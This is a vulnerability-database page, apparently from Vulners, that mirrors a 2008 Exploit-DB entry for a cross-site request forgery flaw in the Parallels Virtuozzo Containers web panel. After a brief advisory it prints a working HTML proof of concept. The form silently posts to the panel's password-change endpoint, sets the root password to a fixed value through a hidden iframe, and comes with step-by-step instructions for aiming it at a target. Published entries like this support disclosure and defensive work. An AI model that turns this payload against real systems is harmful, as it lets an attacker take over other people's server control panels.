Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Parallels Virtuozzo Containers 3.0.0-25.4.swsoft VZPP Interface Change Pass - Cross-Site Request Forgery

🗓️ 03 Apr 2008 00:00:00Reported by poplixType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 20 Views

Parallels Virtuozzo Containers 3.0.0-25.4.swsoft VZPP Interface Change Pass - Cross-Site Request Forgery vulnerabilit

Code
source: https://www.securityfocus.com/bid/28593/info

Parallels Virtuozzo Containers is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.

Virtuozzo Containers 3.0.0-25.4.swsoft is vulnerable; other versions are also affected. 

<!-- poplix papuasia.org -- http://px.dynalias.org -- 04-02-2008 this file exploits a vulnerable installation of virtuozzo web panel by setting root password to "csrfsafepass" tested against Version 25.4.swsoft (build: 3.0.0-25.4.swsoft) perform the following steps to test it: 1. in this file replace 127.0.0.1 with target vps address 2. open a web browser and log into virtuozzo web interface 3. open this file in a new browser window and click the "change pwd" --> <form target=vrtifr name="defaultForm" method="post" action="https://127.0.0.1:4643/vz/cp/pwd"> <input type="hidden" name="passwd" value="csrfsafepass"> <input type="hidden" name="retype" value="csrfsafepass"> <input type="hidden" name="_submit" value="Change" > </form> <iframe style="width:1px;height:1px;visibility:hidden" name="vrtifr"></iframe> <input type=button value="change pwd" onclick="document.defaultForm.submit()">

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
parallels virtuozzo containersvzpp interfacecross-site request forgeryvulnerabilityremote attackersessionpasswordcompromisesecurityfocusexploitinstallationweb panelroot passwordweb interface
20